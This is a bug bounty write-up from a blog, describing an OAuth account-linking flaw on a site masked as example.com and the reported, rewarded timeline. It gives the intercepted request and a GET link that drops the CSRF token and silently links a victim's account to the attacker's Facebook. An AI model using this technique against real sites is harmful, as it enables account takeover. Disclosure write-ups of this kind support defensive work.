Categories
Uncategorized

Vulnerability – Account takeover using OAuth Misconfiguration

About Oauth

OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites but without giving them the passwords. This mechanism is used by companies such as Google, Facebook, Microsoft and Twitter to permit the users to share information about their accounts with third party applications or websites.

Generally, OAuth provides to clients a “secure delegated access” to server resources on behalf of a resource owner. It specifies a process for resource owners to authorize third-party access to their server resources without sharing their credentials. Designed specifically to work with Hypertext Transfer Protocol (HTTP), OAuth essentially allows access tokens to be issued to third-party clients by an authorization server, with the approval of the resource owner. The third party then uses the access token to access the protected resources hosted by the resource server.

Case Study

As this was a private program all illustrations of vulnerabilities will be represented with the host as example.com

The application had a Registration page where a user could register a new username and password which allowed him to log in to the application via the login page.

After successful registration you will be redirected to profile page where you need to fill some more details related to your self and you are good to go.

In the account section you have option to link your Facebook, LinkedIn account.

When you click on link Facebook you will be redirected to Facebook.com and you need to click on authorize this app.

Click on authorize and intercept the request the request, looks something like.

POST /faceboook/couple HTTP/1.1
Host: example.com
user-Agent: Mozilla/5.0
Accept: application/json, text/javascript, /; q=0.0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, default
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 293
COnnection: close
cookie:

action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qyf&csrf=98798asfdcasf7d98s7adf98s7df98a7sdf9

As you can see the POST request has a CSRF token this can be omitted by changing this POST request to GET request something like.

https://www.example.com/facebook/couple?action=couple&access_token=EAAcfyakm,smvnoqgrfuabvkscbvkjwer97823lasnvc9274qyrfhslnc9284fghlcv2bksacvbkisdasbksdbvkbsdkf78asdfbvsda87fsaddbv978sdfbd98sabv98sdvb4hfnsc932fofn4209qytf03fhnbc92y0fhgbce972y308hc92qy&csrf=

And send this to victim as soon as the victim visits the link his/her account will be linked to your Facebook account and you can access that with login with Facebook option.

Reported: 3 march 2020
Responded: 4 march 2020
Rewarded: $300 6 march 2020

Leave a Reply

Your email address will not be published. Required fields are marked *